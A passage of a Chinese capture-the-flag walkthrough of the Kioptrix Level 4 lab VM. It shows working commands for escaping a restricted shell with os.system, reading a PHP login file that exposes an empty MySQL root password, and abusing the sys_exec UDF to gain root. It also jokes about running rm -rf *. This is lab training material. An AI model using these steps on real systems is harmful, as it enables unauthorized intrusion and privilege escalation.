[C:\~]$ ssh john@192.168.1.6Connecting to 192.168.1.6:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.WARNING! The remote SSH server rejected X11 forwarding request.
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ 

逃逸受限的shell成功。

3.3 mysql udf提权

3.3.1 查看服务

john@Kioptrix4:~$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:22 ?        00:00:03 /sbin/init
root         2     0  0 16:22 ?        00:00:00 [kthreadd]
root         3     2  0 16:22 ?        00:00:00 [migration/0]
root         4     2  0 16:22 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 16:22 ?        00:00:00 [watchdog/0]
root         6     2  0 16:22 ?        00:00:00 [migration/1]
root         7     2  0 16:22 ?        00:00:00 [ksoftirqd/1]
root         8     2  0 16:22 ?        00:00:00 [watchdog/1]
root         9     2  0 16:22 ?        00:00:00 [events/0]
root        10     2  0 16:22 ?        00:00:00 [events/1]
root        11     2  0 16:22 ?        00:00:00 [khelper]
root        46     2  0 16:22 ?        00:00:00 [kblockd/0]
root        47     2  0 16:22 ?        00:00:00 [kblockd/1]
root        50     2  0 16:22 ?        00:00:00 [kacpid]
root        51     2  0 16:22 ?        00:00:00 [kacpi_notify]
root       247     2  0 16:22 ?        00:00:00 [kseriod]
root       291     2  0 16:22 ?        00:00:00 [pdflush]
root       292     2  0 16:22 ?        00:00:00 [pdflush]
root       293     2  0 16:22 ?        00:00:00 [kswapd0]
root       335     2  0 16:22 ?        00:00:00 [aio/0]
root       336     2  0 16:22 ?        00:00:00 [aio/1]
root      1742     2  0 16:22 ?        00:00:00 [ksuspend_usbd]
root      1746     2  0 16:22 ?        00:00:00 [khubd]
root      2180     2  0 16:22 ?        00:00:00 [ata/0]
root      2181     2  0 16:22 ?        00:00:00 [ata/1]
root      2185     2  0 16:22 ?        00:00:00 [ata_aux]
root      2629     2  0 16:22 ?        00:00:00 [scsi_eh_0]
root      2657     2  0 16:22 ?        00:00:00 [scsi_eh_1]
root      2658     2  0 16:22 ?        00:00:00 [scsi_eh_2]
root      2659     2  0 16:22 ?        00:00:00 [scsi_eh_3]
root      2660     2  0 16:22 ?        00:00:00 [scsi_eh_4]
root      2661     2  0 16:22 ?        00:00:00 [scsi_eh_5]
root      2662     2  0 16:22 ?        00:00:00 [scsi_eh_6]
root      2663     2  0 16:22 ?        00:00:00 [scsi_eh_7]
root      2664     2  0 16:22 ?        00:00:00 [scsi_eh_8]
root      2665     2  0 16:22 ?        00:00:00 [scsi_eh_9]
root      2666     2  0 16:22 ?        00:00:00 [scsi_eh_10]
root      2667     2  0 16:22 ?        00:00:00 [scsi_eh_11]
root      2668     2  0 16:22 ?        00:00:00 [scsi_eh_12]
root      2669     2  0 16:22 ?        00:00:00 [scsi_eh_13]
root      2670     2  0 16:22 ?        00:00:00 [scsi_eh_14]
root      2671     2  0 16:22 ?        00:00:00 [scsi_eh_15]
root      2672     2  0 16:22 ?        00:00:00 [scsi_eh_16]
root      2673     2  0 16:22 ?        00:00:00 [scsi_eh_17]
root      2674     2  0 16:22 ?        00:00:00 [scsi_eh_18]
root      2675     2  0 16:22 ?        00:00:00 [scsi_eh_19]
root      2676     2  0 16:22 ?        00:00:00 [scsi_eh_20]
root      2677     2  0 16:22 ?        00:00:00 [scsi_eh_21]
root      2678     2  0 16:22 ?        00:00:00 [scsi_eh_22]
root      2679     2  0 16:22 ?        00:00:00 [scsi_eh_23]
root      2680     2  0 16:22 ?        00:00:00 [scsi_eh_24]
root      2681     2  0 16:22 ?        00:00:00 [scsi_eh_25]
root      2682     2  0 16:22 ?        00:00:00 [scsi_eh_26]
root      2683     2  0 16:22 ?        00:00:00 [scsi_eh_27]
root      2684     2  0 16:22 ?        00:00:00 [scsi_eh_28]
root      2685     2  0 16:22 ?        00:00:00 [scsi_eh_29]
root      2686     2  0 16:22 ?        00:00:00 [scsi_eh_30]
root      2990     2  0 16:22 ?        00:00:00 [scsi_eh_31]
root      2992     2  0 16:22 ?        00:00:00 [scsi_eh_32]
root      3287     2  0 16:22 ?        00:00:00 [kjournald]
root      3458     1  0 16:22 ?        00:00:00 /sbin/udevd --daemon
root      3805     2  0 16:22 ?        00:00:00 [kgameportd]
root      4103     2  0 16:22 ?        00:00:00 [kpsmoused]
root      5400     1  0 16:22 tty4     00:00:00 /sbin/getty 38400 tty4
root      5401     1  0 16:22 tty5     00:00:00 /sbin/getty 38400 tty5
root      5408     1  0 16:22 tty2     00:00:00 /sbin/getty 38400 tty2
root      5410     1  0 16:22 tty3     00:00:00 /sbin/getty 38400 tty3
root      5413     1  0 16:22 tty6     00:00:00 /sbin/getty 38400 tty6
syslog    5449     1  0 16:22 ?        00:00:00 /sbin/syslogd -u syslog
root      5468     1  0 16:22 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      5470     1  0 16:22 ?        00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
root      5489     1  0 16:22 ?        00:00:00 /usr/sbin/sshd
root      5545     1  0 16:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      5588  5545  0 16:22 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      5662     1  0 16:22 ?        00:00:00 /usr/sbin/nmbd -D
root      5664     1  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
root      5678  5664  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
root      5679     1  0 16:22 ?        00:00:00 /usr/sbin/winbindd
root      5683  5679  0 16:22 ?        00:00:00 /usr/sbin/winbindd
daemon    5700     1  0 16:22 ?        00:00:00 /usr/sbin/atd
root      5711     1  0 16:22 ?        00:00:00 /usr/sbin/cron
root      5733     1  0 16:22 ?        00:00:00 /usr/sbin/apache2 -k start
dhcp      5783     1  0 16:22 ?        00:00:00 dhclient eth1
root      5790     1  0 16:22 tty1     00:00:00 /sbin/getty 38400 tty1
root      5806  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
root      5807  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
www-data  6714  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6715  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6716  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6717  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6718  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6719  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  6720  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
root      6729  5489  0 17:58 ?        00:00:00 sshd: john [priv]
john      6731  6729  0 17:58 ?        00:00:00 sshd: john@pts/0 
john      6732  6731  0 17:58 pts/0    00:00:00 python /bin/kshell
john      6733  6732  0 18:02 pts/0    00:00:00 sh -c /bin/bash
john      6734  6733  0 18:02 pts/0    00:00:00 /bin/bash
john      6753  6734  0 18:05 pts/0    00:00:00 ps -ef

确认mysql是 root权限启动
我们将尝试利用mysql 提权

3.3.2 php文件查找

john@Kioptrix4:~$ find /var/www -name *.php
/var/www/login_success.php
/var/www/index.php
/var/www/member.php
/var/www/checklogin.php
/var/www/logout.php
/var/www/robert/robert.php
/var/www/john/john.php

3.3.3 查看php文件

john@Kioptrix4:~$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 rowif($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"session_register("myusername");session_register("mypassword");header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}ob_end_flush();
?>

发现登录mysql的用户名为:root,密码为空。

3.3.4 登录mysql数据库

john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6258
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)Type 'help;' or '\h' for help. Type '\c' to clear the buffer.mysql> 

登录成功

3.3.5 查看udf表

mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

脚本文件下载成功。

3.3.6 管理员用户组添加

利用 sys_exec()函数将john用户添加到管理员组。

mysql> select sys_exec('usermod -a -G admin john '); 
+---------------------------------------+
| sys_exec('usermod -a -G admin john ') |
+---------------------------------------+
| NULL                                  | 
+---------------------------------------+
1 row in set (0.04 sec)

添加用户组成功。

3.3.7 切换超级管理员

密码为：MyNameIsJohn

john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# 
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root

我们到这里已经获得root权限，O(∩_∩)O哈哈~ 可以执行rm -rf * 了

3.3.8 flag

root@Kioptrix4:/home/john# cd /root
root@Kioptrix4:~# ls
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.If you haven't already, check out the other VMs available on:
www.kioptrix.comThanks for playing,
loneferret

至此，我们关于此处渗透测试已经结束

---

渗透总结

在本次Kioptrix Level #4靶机渗透测试，内容包括主机扫描（nmap\netdiscover）、端口扫描（nmap\masscan）、目录扫描（dirb\dirsearch）、SQL注入、使用udf进行系统提权等内容：

• 主机发现
• 目录扫描
• 端口扫描
• SQL注入
• shell逃逸
• udf系统提权

---

参考文章

• Kioptrix Level #4靶场
• arp-scan使用
• Netdiscover基本使用
• nmap详细使用教程
• 黑客工具之whatweb详细使用教程
• dirsearch - Web path discovery
• Sqlmap使用指南(手把手保姆版)持续更新
• mySql的UDF是什么
• Kioptrix Level #4